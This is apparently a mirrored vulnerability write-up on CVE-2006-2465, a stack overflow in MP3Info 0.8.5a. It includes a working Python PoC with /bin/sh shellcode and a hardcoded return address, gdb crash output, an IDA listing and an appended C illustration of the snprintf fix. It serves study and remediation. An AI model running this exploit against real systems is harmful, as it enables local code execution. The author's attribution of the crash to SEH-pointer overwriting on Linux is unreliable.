Linux vulnerability analysis: MP3Info 0.8.5a code execution vulnerability, CVE-2006-2465 - vulnerability warning - the black bar safety net

ID MYHACK58:62201783971
Type myhack58
Reporter Anonymous
Modified 2017-03-05T00:00:00


Author: k0shl. Please credit the source when reprinting.

Vulnerability description

Software download:


# Original PoC (Python 2); it invokes mp3info with the malformed argument.
import errno
import subprocess

junk = "\x90\x90\x90\x90" * 8
# execve("/bin//sh") shellcode
shellcode = "\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"
buffer = "\x90\x90\x90\x90" * 89
eip = "\x10\xf0\xff\xbf"

print "# MP3info is prone to a Stack-BoF"
print "# Wasting CPU clocks on unusable exploits"
print "# This exploit is for educational purposes"

try:
    subprocess.call(["mp3info", junk + shellcode + buffer + eip])
except OSError as e:
    if e.errno == errno.ENOENT:
        print "MP3Info not found!"
    else:
        print "Error executing exploit"
        raise

Test environment:

Kali 2.0

This is a local code execution vulnerability. The PoC does nothing more than call mp3info with a malformed string on the command line; you can just as well pass the malformed string directly with $(python -c ...). Open the program in gdb and run it with the same $(python -c ...) argument and you land directly at the crash. This is the first Linux vulnerability I have debugged; it is fairly basic and quite representative.

This is my first Linux analysis post, recorded here as a memento! I picked up many new Linux debugging methods and learned a great deal.

Vulnerability reproduction

This vulnerability is not quite what the description above suggests. While handling the MP3 path, the file cannot be read, so the program enters its error-handling path and passes the offending file path as the message argument to Linux's perror(). An error occurs while that message is processed, execution enters the SEH exception function, and arbitrary code execution is then achieved by overwriting the SEH pointer. A detailed analysis of the vulnerability follows.

First we need to compile MP3Info under Linux, which requires the libncurses5-dev header package. Once it is installed, MP3Info can be built; after building, instead of using the PoC we pass the malformed string directly from python.

root@root:~/Desktop/mp3info-0.8.5a# ./mp3info $(python -c 'print "\x41"*100')
Error opening MP3: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA: No such file or directory
root@root:~/Desktop/mp3info-0.8.5a# ./mp3info $(python -c 'print "\x41"*700')
Segmentation fault

When the malformed string reaches a length of 700, the program reports a Segmentation fault, that is, an invalid pointer dereference, which here means a buffer overflow has occurred. Let's use gdb-peda to look at the state at the time of the crash.

The first is the crash point.

[-------------------------------------code-------------------------------------]
   0xb7e067cb <__GI_getenv+107>:	mov    esi,DWORD PTR [ebp+0x0]
   0xb7e067ce <__GI_getenv+110>:	test   esi,esi
   0xb7e067d0 <__GI_getenv+112>:	je     0xb7e0682a <__GI_getenv+202>
=> 0xb7e067d2 <__GI_getenv+114>:	cmp    di,WORD PTR [esi]

The fault occurs at the cmp instruction, so we can already conclude that the esi register holds an unreadable address.

[----------------------------------registers-----------------------------------]
EAX: 0x6
EBX: 0xb7f7c000 --> 0x1a5da8
ECX: 0x414c ('LA')
EDX: 0xffbab8be
ESI: 0x41414141 ('AAAA')

ESI really does hold the unreadable address 0x41414141, so we now walk back up the call stack.

gdb-peda$ bt
#0  __GI_getenv (name=0xb7f32ff5 "NGUAGE", name@entry=0xb7f32ff3 "LANGUAGE")
    at getenv.c:85
#1  0xb7dff10e in guess_category_value (
    categoryname=0xb7f1c953 <_nl_category_names+51> "LC_MESSAGES", category=<optimized out>) at dcigettext.c:1356
#2  __dcigettext (
    domainname=domainname@entry=0xb7f32fae <_libc_intl_domainname> "libc", msgid1=msgid1@entry=0xb7f336a5 "File name too long", msgid2=msgid2@entry=0x0, plural=plural@entry=0x0, n=n@entry=0x0, category=category@entry=0x5) at dcigettext.c:561
#3  0xb7dfe1f3 in __GI___dcgettext (
    domainname=0xb7f32fae <_libc_intl_domainname> "libc", msgid=0xb7f336a5 "File name too long", category=category@entry=0x5) at dcgettext.c:52
#4  0xb7e4ff2f in __GI___strerror_r (errnum=errnum@entry=0x24,
    buf=buf@entry=0xbfffea20 "@\360\377\267", buflen=buflen@entry=0x400) at _strerror.c:71
#5  0xb7e36257 in perror_internal (fp=fp@entry=0x804f008,
    s=s@entry=0xbffff040 "Error opening MP3: ", 'A' <repeats 181 times>..., errnum=errnum@entry=0x24) at perror.c:37
#6  0xb7e3633e in __GI_perror (
    s=0xbffff040 "Error opening MP3: ", 'A' <repeats 181 times>...) at perror.c:74
#7  0x08049597 in main (
    argc=<error reading variable: Cannot access memory at address 0x41414141>, argv=<error reading variable: Cannot access memory at address 0x41414145>) at mp3info.c:195
Backtrace stopped: previous frame inner to this frame (corrupt stack?)

What matters is the call site at 0x08049597 in main, because every frame above it is inside the system (libc) functions. We therefore start the analysis from 0x08049597.

Vulnerability analysis

Opening the ELF file in IDA, we look at the call at 0x08049597.

loc_804957B:
    fp = eax                            ; FILE *
    lea     edi, [ebp+error_msg]
    fp = edx                            ; FILE *
    push    eax
    push    dword ptr [esi]
    push    offset aErrorOpeningMp      ; "Error opening MP3: %s"
    push    edi                         ; s
    call    _sprintf
    mov     [esp], edi                  ; s
    call    _perror
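The listing above is the root cause, and it matches the flow described under "Vulnerability reproduction": sprintf() formats the user-controlled path into main()'s fixed-size stack buffer error_msg with no length check, and the result is then handed to perror(). The C example below is added here for illustration and is not MP3Info's code. The buffer size ERROR_MSG_SIZE (256) is an assumption, since the page does not state the real size, and the 700-byte path is a constructed input mirroring the page's $(python -c 'print "\x41"*700') reproduction. It places the vulnerable pattern beside two hardened forms and checks that the bounded version truncates the message instead of overflowing the buffer.

```c
#include <errno.h>
#include <stdio.h>
#include <string.h>

/* Assumed size of main()'s error_msg buffer; the page names the buffer
 * but does not give its length. */
#define ERROR_MSG_SIZE 256

/* Vulnerable pattern, as seen in the IDA listing: sprintf() writes
 * "Error opening MP3: <path>" into a fixed stack buffer with no bound, so a
 * path longer than the buffer overwrites the saved frame before perror()
 * is even reached. Kept for comparison only; it is never called here. */
static void report_open_error_vulnerable(const char *path)
{
    char error_msg[ERROR_MSG_SIZE];
    sprintf(error_msg, "Error opening MP3: %s", path);  /* unbounded write */
    perror(error_msg);
}

/* Hardened form 1: snprintf() bounds the write to the buffer and returns
 * the length the full message would have needed, so truncation can be
 * detected instead of silently corrupting the stack.
 * Returns 1 if the message was truncated, 0 otherwise. */
static int format_open_error(char *out, size_t out_size, const char *path)
{
    int needed = snprintf(out, out_size, "Error opening MP3: %s", path);
    return needed < 0 || (size_t)needed >= out_size;
}

/* Hardened form 2: avoid the intermediate buffer entirely. errno is read
 * before any call that could change it, and the path is passed as a %s
 * argument rather than being spliced into a buffer first. */
static void report_open_error_safe(const char *path)
{
    int saved_errno = errno;
    fprintf(stderr, "Error opening MP3: %s: %s\n", path, strerror(saved_errno));
}

/* Constructed input: 700 'A' bytes, like the page's reproduction command.
 * Returns the truncation flag from the bounded formatter. */
static int demo_long_path_truncated(void)
{
    char path[701];
    char error_msg[ERROR_MSG_SIZE];
    memset(path, 'A', 700);
    path[700] = '\0';
    return format_open_error(error_msg, sizeof error_msg, path);
}

/* Length of the bounded result for the same input: the buffer stays
 * NUL-terminated at ERROR_MSG_SIZE - 1 characters, never beyond it. */
static size_t demo_long_path_len(void)
{
    char path[701];
    char error_msg[ERROR_MSG_SIZE];
    memset(path, 'A', 700);
    path[700] = '\0';
    format_open_error(error_msg, sizeof error_msg, path);
    return strlen(error_msg);
}

/* A short, well-formed path is formatted intact and not truncated. */
static int demo_short_path_ok(void)
{
    char error_msg[ERROR_MSG_SIZE];
    int truncated = format_open_error(error_msg, sizeof error_msg, "song.mp3");
    return !truncated && strcmp(error_msg, "Error opening MP3: song.mp3") == 0;
}

int main(void)
{
    printf("700-byte path truncated: %d (message length %zu)\n",
           demo_long_path_truncated(), demo_long_path_len());
    printf("short path formatted intact: %d\n", demo_short_path_ok());
    errno = ENOENT;
    report_open_error_safe("missing.mp3");
    (void)report_open_error_vulnerable;  /* referenced only to keep -Wunused quiet */
    return 0;
}
```

The snprintf() variant is the minimal patch for code shaped like the listing; the fprintf() variant is the better design, since the message never needs a stack buffer at all and the attacker-controlled path can only ever be a %s argument.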
